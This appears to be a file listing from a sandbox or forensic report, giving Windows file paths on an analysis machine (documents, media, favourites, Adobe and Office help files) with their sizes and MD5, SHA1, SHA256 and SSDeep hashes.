C:\Users\5p5NrGJn0jS HALPmcxz\Music\4fONS\zDJHX2UBtq2jNGLqtNRG.mp3	47.75 KB	MD5: f921b641e6b27ab366b820ee6c4d5079 SHA1: 0d98085940b9ade82e131443ad98fb39218470c2 SHA256: 6ffc65fae22ca431396bb18a34c3c699db9eba70141eb8f5c87b8d222f9b010a SSDeep: 768:q0Uwzbxp2WgKcmiNYSnRwxOd9SnwEizX2UEQE0cZuoGcpgN47jKK6Su6Ye:lxbTZriNYSneObIzi9E04RGcX68Ye	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\I_5X.xlsx	67.93 KB	MD5: af9a57eebb0bb5f0cf760743d390c3d8 SHA1: 8312750d410f09d391ff4085e8c02ceada062319 SHA256: 4465a041bc44b2d75979a485eb7fd8a25e9d6b6e7d103486907fb97119d29202 SSDeep: 1536:6KsmNCbBhaPwCCRts4ogT0IZLes8ac9l6+kwTLlyN4Mix++F6V:1hQbBhKAUGT0YKsU9rBTL4/t	... File Actions Show Properties Download
C:\ProgramData\Adobe\ARM\Reader_10.0.0\AdbeRdrUpd10116_MUI.msp	10.00 MB	MD5: 2ec3fdcfa2ed1287163b43cf36ab604a SHA1: 32d555ca6e4784a1f9109f7c0c622c1d30681b68 SHA256: 0b29cca75fd26391ea614b2b12eb95fc37bbf80b63e7cda6857e3426f09f26bb SSDeep: 196608:C+vjzyOui6r+Qo4iT6YqQitS7+KgxUzGVw9vV+Ud5CP46ZjNK:FrN67xdBISxUzGVw7+YMggK	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\hT-SqtZX\U9tSiBmpae-S.ppt	77.17 KB	MD5: b6be1b223d05269aa39da5fb8fbe1d3a SHA1: 991d9e2d3cd6c496ed9d09a8a320f4bc4485debf SHA256: 1de7893586d38a19157bcb70d890a673e3fbcf5d3173284a13f466b3e8468386 SSDeep: 1536:n9FV37gTqP0y1f+dbK8fxteFA/ByKZGCjI9pkL9NiTTr84syBX7eV8:NgTqPB1fqbDxAApDNjb6rnjreV8	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Saved Games\desktop.ini	0.28 KB	MD5: 436b5c9eda5f59dd3ba6cb306e72ef19 SHA1: d159de7699ba26507f9ccdabd10a9af1085a591d SHA256: 0d69074af3649d15488c9a581c0636cafeaf1441cc4036f4967545e4214eeed0 SSDeep: 6:Chp3bZ9tz20guqtHO7oxR+asti5K59q5GYigX1OPlL:ilZ9RF+tHms0astiA9uG8X09L	... File Actions Show Properties Download
C:\ProgramData\Adobe\ARM\Reader_10.0.0\AdbeRdrSecUpd10111.msp	246.00 KB	MD5: 9c7a1894da76029cbf9ffc995c5bb62a SHA1: 71845d6e90551ed90521c31170d954b4d0f3041d SHA256: 7f35b49c07ebd864efcf8b1ca5c1c2a4d19fda69a6964df3e3c8c944a4594cc9 SSDeep: 6144:EfexQRnQ3FKZ8tUOg90gLDIaNbyp8ElSRDVEB2cAFHxdvHPmA09/P6q5dA:EfDt8tPcIaNe8	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\ubh3Kx_A\_NTc8TO6LpPJ5zXjg.gif	83.08 KB	MD5: 5563980f61c18a89f2f23f8133c18d65 SHA1: e9f6074211a015eee6be3a4f85f7c5349d34cb1c SHA256: 1ebf51bc9c44b14c6857bb244b84615ffc821f6ad95ac7a53e3c0f7a0f3d2f5f SSDeep: 1536:MGKwa3zn3h4YqeYwC05psbibrKvOeimjxXFerIhmCuk3oIA:MGCzn3KYfhC055udFVkIhHf3o5	... File Actions Show Properties Download
C:\ProgramData\Microsoft Help\MS.INFOPATH.14.1033.hxn	0.34 KB	MD5: d014dde20e3ae271afc73170d993dcf8 SHA1: 38576c28a4c7782fccb5184bb55d0a2af6a59e34 SHA256: a8dffba703b4612ec1ec3da3dabf07490deb326cfb30dcfe19c67a17e002a370 SSDeep: 6:gn9p0BLjFu2LZGckH6WM9356uawQkCqvm2f7jDbDy8JImcI35mWTap:K9mBMuJksY9Nqvm2fPDbDBXnTap	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\Dkb64er\r7-FdG2eJ6-ET_j.doc	23.69 KB	MD5: 9208d9048e1447774b512c3d2dfe0111 SHA1: d677d238cd417469e816a003affc770dfdcfa564 SHA256: 2ab61c0c519bbcf8031721a7096836fdaad4f2af6e7cc976af1615716deea84d SSDeep: 384:1oFuLERcCJ9wO1Iz1sdSfdAEfUTCrHNcbZNHcYhLZH0FAksqVue6mBeCreTHUKQf:1oFIUZ2O1czCEfNcbZ5cYhLZLk8hmHlR	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Home.url	0.13 KB	MD5: 89c6a97cd067a0ca538e17acac7a7563 SHA1: 5aa3f2cde3d1f5f9aa4e4f65299d08c9e5186b9d SHA256: 586cb74ef5013973bb9775cd4c14c52cae76f336091e037d9ff96c5f9f3f54dc SSDeep: 3:afwSkqOCAPkOfaO7dvjYPDz58Q0xz6vtkdzN9exODqQKs:afwSkeMRRkPDz58dz6vtkhnd	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\desktop.ini	0.21 KB	MD5: da6a43268d24113ab42bd68ff9a1cd37 SHA1: d0bb61453d0443ae1c50b7a028be7e4c89d778a1 SHA256: 489c4c01842875dfc869795baaec0cf3cdcf77aef7b58af6db7a194e146340e0 SSDeep: 3:roL5hucUG3nlBFZx9JJCUzKEETUbi+wVqDgU/FcZgIkHShlEMKynH0DfbY40+:Chp3bZ9bZoUG+19cZzkHSha4if847	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\n7JpqV\ZEsdNS.jpg	27.63 KB	MD5: 06b8c6b26bd8079d22afc99c5489fd46 SHA1: c794609ad41874e67b6e2d8c95cd16154522e783 SHA256: e8e8fd8ae12e6e5d171db13875f91adfc64c79f8fc73625cf2ae0c5315d021b2 SSDeep: 768:UndHo1JSVUpa9w5psMr5uuQvQyB7GARXRIKc6v:i0SVmaFMr5uuQvNRhdc6v	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\Dkb64er\hs9eu0cg_VHy7\shTUZEa.ppt	58.94 KB	MD5: 760c0a8fa3bf6cbc95d050d30def9ca0 SHA1: 714746a8b8accec7404bfc9a18f18ed973bc7155 SHA256: b30d59cb361d0951e4aa063c82b5522a00a7138edcd681dd4d531cbc2299fc97 SSDeep: 1536:QPnFgYhumDDx/TUyCCbpL+xJtEWkCs0l3Bs5LbfuCV:QvFgY88x/T5FEEWkL0hCtfd	... File Actions Show Properties Download
C:\ProgramData\Microsoft Help\MS.SETLANG.14.1033.hxn	0.33 KB	MD5: a627b84625714b4b311063fd4d1070e6 SHA1: ab25c8a0816b2fc8d873cbfb68ba6520427c5182 SHA256: 93ce6f596e290e558cdad9f364dbe9266960d18837fc1b9be31cbdf838399e12 SSDeep: 6:gnlmWgpdq78pROxKpbZq6SmGj7fdiGIdzjAz9Fz9zPk2n+8vNpSKbkm:KvwPp5Gj71iGI50xJ9zc2nzvNpJB	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Spaces.url	0.13 KB	MD5: 8230430a05cf63da9268dee0a2b1f1c8 SHA1: 3385f29007be055ef1811ffe3c8a38c3c51610a9 SHA256: f18180edb6796a812dc81e77d54d7c1a5ab4990718ea545f8d9bf755c216a160 SSDeep: 3:afwSkqOCAPkOfaO7dvjYPDz58Q0xz6vtkdzN9exub0XWSHs:afwSkeMRRkPDz58dz6vtkhmW9	... File Actions Show Properties Download
C:\ProgramData\Microsoft Help\MS.MSOUC.14.1033.hxn	0.32 KB	MD5: 1a3018299118e95db33c9c1dbe653ad0 SHA1: 2f05213d2a13f7502ffa50ac2c77f9d9bb1c88ae SHA256: 79a220102359dba6ab8fb6e6d82859225af3e2353145cd9f6574f99ddca01325 SSDeep: 6:gnG8ABxaw2UtohMvV0xzNPn2JXq3K9fNIamKpCiGSOxje0IAZLcjEWHSFmOltPR2:KKWNMvyxzNvm6aHIamKhYje0I8cAWHSO	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\QaUjhe\8q988doXb.png	60.05 KB	MD5: 2d3b9ea8f22c5afbeed5c81a3c9a222b SHA1: 14db5bf44b1a81675cfa8ffdb4899002d3eb9ebb SHA256: 2e338af6734aac0a84fc68da62bacaab3aef91f72cecbb0675cf2707439e893b SSDeep: 1536:ybGFjShz67uVXxOaITJHGq06dVqpMz50EKrAyswR:ybGizmuVX+NGqVqy3xY	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\fpsQYKF MOi0MA.flv	2.33 KB	MD5: 3bf92e6642fc5eae1019c3b7e30f15ff SHA1: 6319fe4404de5d20e8e528620e625d5f307f6598 SHA256: 36da7558173e970b8b66d76c686a0b5fb10ed07e12e1fe5f6c251569d21243c9 SSDeep: 48:gpqk2cw+R1OkVVKawB6OycrElautUCg+oaU8tmSC4DEAO0mv2/3/9d74:g3nOSxSru+Kw8tB9E9+/3nk	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Searches\desktop.ini	0.51 KB	MD5: d5e80eef3f50fb317b6eed39ea0aee8a SHA1: 637b72b3ae9fa509e8e30f2d7ffae40eaf73efbf SHA256: 0aa3a0e5032b595baaef93c36660b8569ce2a626524e505dfca9a692257863f8 SSDeep: 12:ilZ9RF+tHms0a8T3NxnmUYq409jxdnr0KGhKS9P1x2hc4vv:il32h8TTz4GdngfP10hcSv	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\n7JpqV\8ctUF06 2SC36xX7cR0\luqHM\l7-qaXxV0q.gif	62.68 KB	MD5: 7b60e5d3d38102d37b187b36f5eae790 SHA1: 1afc20dd713d42d8f35d0e853c2511c081df8df8 SHA256: 86a7f917c431d4f56cb3e6aaed9af459250bba4ab48c34d2616ed019ead47245 SSDeep: 1536:cPeqW/YTJzS5NiLCu3JfCPicHaU/YQykTXceDddh2j6JqI6jlONP:cWq5wPiL15fOVaUfbR6mgzhyP	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\Dkb64er\hs9eu0cg_VHy7\d8R9rMlCN.odp	9.12 KB	MD5: e5c025a52b3cf3cbf116bd55d68f988c SHA1: 00873e6b62bc2422bc7286bb4fcb4f033ed86d66 SHA256: 2dd07a7566d0377e0ea9729acfac6fae99dbd51e1b2102865fefe3766d8690b4 SSDeep: 192:DfupTqMR3mNUImyQPfTsku+/f5qwXnJ7EUR/aSMdqwlVrI1Wl:TVMR3mNUImyYTsNkAUVXalV81Wl	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\36USA68T\imagesrv.adition[1].xml	0.01 KB	MD5: b7fc855b4810f0d20cfa328da83e22ef SHA1: c04d8472b055c9e2d6cc47b7242b303a57393187 SHA256: 0bceee388ddc1eac759296c53c33570937da6e04f4b0c4eb745f1f3be69deac6 SSDeep: 3:MyE:zE	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Links\Downloads.lnk	0.91 KB	MD5: 4c6ab99642f36538a6273507c1c7d03b SHA1: 66dd79c17ab4a1497e826a1653c3c31b66a0cea7 SHA256: 9412f1062553ac3914a021db700eb5c6d131cf1b8f7444a37a6eaf8ea51df49d SSDeep: 24:p3GQ6mbEp/NwPxcu3isE2uAZGtrgwabg9:pWCW/NqxcZp9AAJF	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\FLEcvhR.xls	68.37 KB	MD5: 165ed90e7cbe51ed69fd68ebcce5a23f SHA1: d880fe9d067fd8ede6467be4da7e5db02e6b3ce6 SHA256: e1525ae5c14c46d7680565aa5b1400a202f4f3c18c115832e2e22f79f63fb5f1 SSDeep: 1536:LHsNH/6zJqUDqe3nXjjY2Q/eGE1vEbHEh3vVABcqp+q8F:TsB/6qUDtnE/eGmukh/VABzxk	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\nvyg\5Lx3KHr.mp3	69.14 KB	MD5: dc09071a8e469163629b7fb6a13959ba SHA1: 5be9a2724f0ec1c592e21bb9a325a0d3bcfd314c SHA256: 37ed08445a0f44154eddedf49178acc0e9683d0a0de1e638a9f27935b8f20138 SSDeep: 1536:o6e2unE3c6HqZgcM+nj4jD8VIzf6XwwTkKNY0hrM4GLVDNiY6:o6nsVgr+nk8y8TkugnVYB	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Suggested Sites.url	0.23 KB	MD5: 866ab23c3a31ccc2a21033f862b0d8e5 SHA1: 706d94bc254e8b3b3269ecdc85cb0aee26ba4025 SHA256: 1796d73aa9ea7b3552c0b74fceb677954bbf2aef7e580a0a503332d7b7490051 SSDeep: 6:afwSkeMRRkPEUKwKTrWe7MjHEmx76XP3YJApF1AKTcN2ONWareNb:qx0HkMUKLWhjHEEmXwOpUKQNRfr0b	... File Actions Show Properties Download
C:\ProgramData\Microsoft Help\MS.POWERPNT.DEV.14.1033.hxn	0.36 KB	MD5: 3e8e251a76f604d18454de05d436de11 SHA1: 8efbf0b90d15192ba7299e07a04d6f8f99b30364 SHA256: 21e0094523482ba5701f6ca4177c267c935505e945ccf87b4c8c09e4af688106 SSDeep: 6:gnpdHCGmROG4AuReiwuBgeAU3DyY2a4ZRAuyR/CQPz7SzPuu9DzFfLCr:KpdHCjYG4IMBT72awRLsZKPuiz5c	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Gallery.url	0.13 KB	MD5: 19e0777d0d1cc57863e57a9a9ea704d8 SHA1: cc87b36707b5736a9e49cbc52c6c36b805683adf SHA256: 9fef96aba45269a95fc803bd2539960ebb0a798d1af016d3576564ccd7620103 SSDeep: 3:afwSkqOCAPkOfaO7dvjYPDz58Q0xz6vtkdzN9exub0cSWszr7s:afwSkeMRRkPDz58dz6vtkhsclSM	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\skaVx\4xdI4OMOFBx3cqRfxwA0.xlsx	43.21 KB	MD5: 93c8c11216be79b0db9015d1df7b534d SHA1: f4b358aad1855d1545b8b4f0b3e555fccd7dd463 SHA256: ed17bfb7180e3b03b9ef95a65e23d328d5a23d4bd794dbe3d25b1faae173e799 SSDeep: 768:6LO50uCUBQcE7i36+l+FW/tbITwjU4XgG7e9v35Q03bzU76P6sp8bKdOmP/+gplA:6LO50PUB67iJ+08wze3Hcxsp8bIX5lA	... File Actions Show Properties Download
C:\ProgramData\Microsoft Help\MS.WINWORD.14.1033.hxn	0.33 KB	MD5: cf49eea4ad5e38250e45a3c772051bda SHA1: 152bbe66e5974b625c76434ca62a42bbdf08b091 SHA256: ecf86183341598c6216050d88d1e5e0f3dd112cf6f4a9e9cd2e2724a7379d1f3 SSDeep: 6:gnl5BV58u8HZthnFmxKpbZq6SmGj7fdiGIdzjAz9Fz9zPk2n+8vNpSKbkm:Kf5Snp5Gj71iGI50xJ9zc2nzvNpJB	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\desktop.ini	0.49 KB	MD5: cd9b253f57aec6718a63f6cb1cccf4ad SHA1: 7735b4c1c3bd3cc059d1ca8f144c0f21de6a3e0a SHA256: 2a255b315f7980bd5191f91e7d9505e2cf3ab241184f6899dfd99439f5029711 SSDeep: 12:ilZ9RF+tHms0asKmkNKZK0Le+qYGRO6Pc1q3NEWSw:il32hsVU0iHcs3WWz	... File Actions Show Properties Download
C:\Users\All Users\Microsoft\Assistance\Client\1.0\en-US\Help_MValidator.Lck.INFOWAIT	0.00 KB	MD5: 62844323a4b7d96693287ba03fc234c6 SHA1: 3f511685ef8fb140118aa10c1c43e026a2262443 SHA256: c4fb81f5bf1132f2df6094aa4094ecf05b750c041086477aa839738c73449fb7 SSDeep: 3:5n:5	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\BflhCY_h.mp4	24.26 KB	MD5: 8225e00e8e78c5c04819343bdd20ded1 SHA1: 01deaaa100a6a3bbdb56d17470129b509d0f530d SHA256: d35a7b46521b71257fc32490ddf2516f35f9c87c6dd518955b2cd28416337332 SSDeep: 768:RtQ/D8aW/7ebNqCjx7Pk+llTqRsD+wdj48ADRAZ:RtQ/D8anqCj5c+7qWRp48AyZ	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft Store.url	0.13 KB	MD5: 7e4be9e940bb241fbf0e950fde52eac7 SHA1: 8d6e61ae3717b0d6e0a94351d3e9806ce2f77fed SHA256: 82bb6e6b8d597dabd23028c6c8f0c85b8c2d87a147171734e613d202a3c6bcad SSDeep: 3:afwSkqOCAPkOfaO7dvjYPDz58Q0xz6vtkdzN9exOZrWbV:afwSkeMRRkPDz58dz6vtkhlra	... File Actions Show Properties Download
C:\ProgramData\Microsoft Help\MS.OUTLOOK.14.1033.hxn	0.33 KB	MD5: 8a1f7b069d3715df19de5b70757acce3 SHA1: 853b41df1029a0e852d58353ae6601a42e391af8 SHA256: c65bb0ae210df9f0b2674d4a873d7e6b4e2027b906d01fcd2588754d7b83332d SSDeep: 6:gnl9sTD/LDFtuJIxKpbZq6SmGj7fdiGIdzjAz9Fz9zPk2n+8vNpSKbkm:K0TLdgJ1p5Gj71iGI50xJ9zc2nzvNpJB	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\xsTHwcnuDqWQ9Jfwv\5NOeuuWGic W5vSvZ.png	18.90 KB	MD5: e70878281a0c7eec509c4fdf958b2bbd SHA1: 7d2068e22345fce77f6b47c736daed8753cd2864 SHA256: 70e7983a81a1402255111bd49aab691ad21120106b5bb5f53160e35e4e905f3b SSDeep: 384:ZNVXyvvYe0my70yMvz31jOkRR5lx1vrnG24mF7I04uGL/E9T:VivvYnmmMvzZOkRjImdsuGL/K	... File Actions Show Properties Download
C:\Users\All Users\Microsoft\Assistance\Client\1.0\en-US\Help_MValidator.H1D.INFOWAIT	14.32 KB	MD5: de4e862f03283db89bceedf31cb9d1ba SHA1: f0d299cf47776903a06c1cd9b1b31ebc6dc0af3c SHA256: 1182b0e64da6b505ca97335bdfcc3c610bd01418d67d86373021970bd2f6d817 SSDeep: 384:pIAWVh37e0ZIMl2t7ne38gF7ysx9TGSEn61FoD19gpYXMzh0s:lWr37qMWe38wDxUwg192as	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\rsqxo_hm.pptx	23.62 KB	MD5: 635596f110d9668745eff4ee6c06154f SHA1: 5acb9ec6b405705c46b3534b1c4562781919a97c SHA256: c6abc4ee70b1fcd581981a810cd637b9dad90fc951798c3e01cac053d3ea1f7e SSDeep: 384:of3hi+NcRYJNvOOjp6Md6IrYJ6fWG3x0GhiGk8pIR/sVNACcQblwhdJifwrt6BjD:ofjNcRYJtOap6I6lYOG3GGsGk8pqU7yM	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\86iUKOznOtmWr4FTVK.xlsx	83.35 KB	MD5: f6e2035013a6b9ece80c91c81efaf98f SHA1: e679ecfff167d0fa0c89c8dee2b4f3274f50bfd0 SHA256: b73a93d5fff5aaa9475aab9986ffd501e345b5df3ba96803c9b0f985788185d7 SSDeep: 1536:6wgPy4gBNC+14b/iOcZN5JRZ4WQ3a78DFTRdTcu7dWJR5Bznnk:YPy4WNC+8qOiPJRZ4WQhDXdTciWJRzI	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE site on Microsoft.com.url	0.13 KB	MD5: 2f10f67b16694d563570958de876db96 SHA1: 6810e6f8a68c6c07483513a985e2c94b5dbc166e SHA256: 7789491a2c7d614364d16615a3d7888f12a6c28efb66ea36355a73b868bd0cfc SSDeep: 3:afwSkqOCAPkOfaO7dvjYPDz58Q0xz6vtkdzN9exOBPs:afwSkeMRRkPDz58dz6vtkhu	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\xsTHwcnuDqWQ9Jfwv\RCe6gFP9n8QcDK.gif	37.10 KB	MD5: 0282303f4d4c72d2041074c471323c5e SHA1: 9adb8261fd40d33610f3e8bbe9a8dc994384e973 SHA256: e7e084352cab1e538fde425703f274327edc487aeb8a7000f568e2bc187a04c7 SSDeep: 768:CTybEFNB5ayT+xXBASkqGp3KE0tV7/6TW/AS3wdWeirY7r0:CTpHTEBa/1aVvwdhr0	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\SNwh\2L5Mp4CJ.ods	54.44 KB	MD5: 8964107e84cd6c58c0f06c47edf65a53 SHA1: b7a53ad9547272f28514f7d5836cdadf6d4423e2 SHA256: c491399f98685e43b0a09b0143fc811bfa8c1700ba91d00b6049840f7da37341 SSDeep: 1536:gBIlQE6vdGqnI+ODT9L/SG+y2YCMzGI9/GH:AIR6vd/nfg/cy2YvCS/GH	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\rXoVxt3oiS\O5g4jLerSHDy3Pf8Z8r\wlnli51d9s.mp3	51.54 KB	MD5: 32f4f75017db4e9958956982db892ba5 SHA1: 9876ad92dd7feaed95f8b67f556f65bc11670ffd SHA256: dde02e9ae4e7d3788dc8c53a1b0aef1139f1e09452368b797d93d5c251b53445 SSDeep: 768:fMdGUhBvWIzWAoTlwG/UZG2uZtvfF6bLRT7gPRQ3W7//twnrDSEWLx:fMdLGuo6G8kp96bKPB7dwn6VLx	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\rXoVxt3oiS\CZRVI9TRu5syJMCnyOV.wav	96.70 KB	MD5: f0463f1d6d848bb95bc05d80497baeaf SHA1: c0ac81fb8da8757009e4ffb5286d30a525daacac SHA256: 5619dd0fc57de3d08fbba7aae814ec31febc90c8b92a89c801de95b22f264140 SSDeep: 3072:32W73k16R3jfBmUJ0xGBhQ+ILYelVKM0voA3PmoQgIQj3:GWb06iUJ0xGBPILYcVKM6E43	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\qRUUXSSNmlOJdjR 6U.flv	22.17 KB	MD5: fb8240c0296445b21905895c2fe144ff SHA1: 41b531f2bdb1dc4165f53eeb447b8caaba2bc8bf SHA256: d2e080894adab1c1ecc9c575acc494ff7fbf7f4c9019ddeff84fefeef832c484 SSDeep: 384:g2ZGKbB2SMNiM2nUDOqH8VsGBw+rWNfIgtDWGSPm7BMQ07Zaj0KOhtp8ndXCFfJp:wKlR+p6UDnH0s4zgtEO7B4k0KO/p8nd0	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\r0_POyzPZT.pptx	77.23 KB	MD5: fb8916b65dacb440e199a1fa18629213 SHA1: 42dbe34ccfd73f67f690fd6bb37e56eb8f4caa6a SHA256: da968741cf87fac484f10a6ba2bc538c19dc46a4a6cb5020a8c968b9eee1c0b1 SSDeep: 1536:oI7ZPVxgmxAM/8DVpOx2bG6n/N0u2MnESde1fDT5RhxvjxbvxewmKXs2C:vZtxxt/YVidgFKMnncfn5Rr7FgwznC	... File Actions Show Properties Download
C:\ProgramData\Microsoft Help\MS.GROOVE.14.1033.hxn	0.32 KB	MD5: fa3affca4a7a54c9902a8b557bd6363d SHA1: 218b9b2196a5f338380442ab8844120e9bb45c00 SHA256: a64ea930cafd2114240322b1619d342783ed93af022c0183ab1af7080dbad156 SSDeep: 6:gnOfc7i7YHffBRt0t2bm3PA++eipFPMszjVftQGaWP2TU5S9l0rPpNa:KOf9grVbIN+TpFPMszJfiGJoU5M0Lva	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\4fONS\XRQKbLhwuLoes9nMF eV.m4a	80.65 KB	MD5: f41329825d86dd23949b152f9120cfe6 SHA1: cedcddd4d7940e2ae597e1b36bd33e54a283f6c9 SHA256: 181dba1a31fd1b332691de7c2a88aa399d2985e5a432300bf06984277940f2df SSDeep: 1536:f6wmFvxFaVO6yvDTp75DGdnn+sLIiK8XHtFkRGg5/a4nhj5yrb:Zmlfai7Tp75+nn+sLM6HtFw5/aM5yrb	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\unlt.docx	17.46 KB	MD5: 0ea13b9e1889ed7fd9ca14869c455665 SHA1: 2e7741cdfc2474be1c08dc0421b03381a40e42ad SHA256: 8d7f42fc81358abc70aef5c435fcd006fe97798ec4e10942c5ca6752a2db5082 SSDeep: 384:L4AAQif/LyQj6lOTTajBxYYZYgM0UperSlW0hf4cu+ttyHu4f3Au:LsVtai0w3U1cuRou	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\_ERMKi.m4a	2.62 KB	MD5: 1f8f970c2fbce0d0fd18d0dc7dd64f5b SHA1: f86f31453bddfbaeef88f456df83c08b8d8b9e90 SHA256: 33c31cc947e9b924cdbcf78fd16aafe34319d4379c418fcd0b3a3b7bf4769d7c SSDeep: 48:z13Dtp62PjE5ent0vk8h2EmNQ9cKQH7ZK3wca5f+gvS5:z1vE5XZTGd7Kwc0f+sS5	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\rXoVxt3oiS\O5g4jLerSHDy3Pf8Z8r\P-MyT-xFsgCgO.m4a	27.16 KB	MD5: cbaea3eaa65abcc118e94a81281d11dc SHA1: ca3452ad6f0c5d91a2a94e340a660f04ff74f164 SHA256: c95569ebfab63b9a9f954ab003a54fe8f8514d115869c47c216efc6db8e87062 SSDeep: 768:RY9Ft5/gRyUsU+oz37aRSB2x88gkEM8DUwpd7eSmIHq4cxK6z:u7SIsz37asAxbqvDUwpXmELcxKM	... File Actions Show Properties Download
C:\Users\All Users\Microsoft\Assistance\Client\1.0\en-US\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q.INFOWAIT	852.77 KB	MD5: 5300899e6d9a7f1ade9d4935bcd6c084 SHA1: 028559db4ae2abc85b24ad4074965cc3649df898 SHA256: 9de290428bcdf0eab7672e4c7e76647ef957fb1bfc64afa8c1e0d5e374c0ac8d SSDeep: 12288:jL36lpuntP6ZWH72qVt5XpG+qx1IiFayg90euNM1JU7pPzDj9aNEJrM:jL3NJaqVzXpG+qx10vwcJKPJKEJ	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE Add-on site.url	0.13 KB	MD5: 9a341727a24e448453308654730c46df SHA1: e7b1705ed7ea801c4f5e18f76a948596b7696870 SHA256: 73c156345fff55f945105e5f941e8f51207e2e81bdacf30f43acc2ca694b98c2 SSDeep: 3:afwSkqOCAPkOfaO7dvjYPDz58Q0xz6vtkdzN9exubiOn8us:afwSkeMRRkPDz58dz6vtkhVn8R	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\Dkb64er\Kgbiq-5bFu_gdXcNS.csv	36.04 KB	MD5: f4085234805dff5f1b1569b7c34984b3 SHA1: ee20fd4691b683e75874cf0698bb1af140f75fa9 SHA256: 582c2775b85a0aa9e3d1bd686196c99993d4da8fe8dc6d4f46e15e4207d1bb5c SSDeep: 768:e4W72LF8MaVgwJf+uttuB+fPeJ1KtcP+5DQ4Yk:e4WE8dizuSBwRI+5DQ4Yk	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yvz8Ck.xls	41.66 KB	MD5: 503a7251d6959daf79067ee4e55fec08 SHA1: a3fe43f8b8351cb3d7eda8ec2ff6b0607cbecf2d SHA256: 5a93f177afce0bd3035078d1c9cede199d6e08bf6cde663cfd3ed823fb87fa98 SSDeep: 768:/VNk1VIdbFKhbmFKxszyXNnnx/CwHH6tHSKWgOYqTwYFkwCRfHI4v0:/Q1qdbYhiS9nx7HWyuOYWzrCRPT0	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\q93T.avi	22.21 KB	MD5: 14011ffc8785fae49320350518b9d947 SHA1: 0bb432a8889ea525007210dd1b992d76ab3bf4e6 SHA256: e4d44be7ecfc7a93ea68e371befc08eff2aea1690d845debb9d27782378cef1b SSDeep: 384:75zQo14gVyoYaMxGKdNg3YtwHFnZj+nUIxhM3Qc2GIJ4rEtg7izN76LP:758oCkYaMxGKne2gg+QcXy4B	... File Actions Show Properties Download
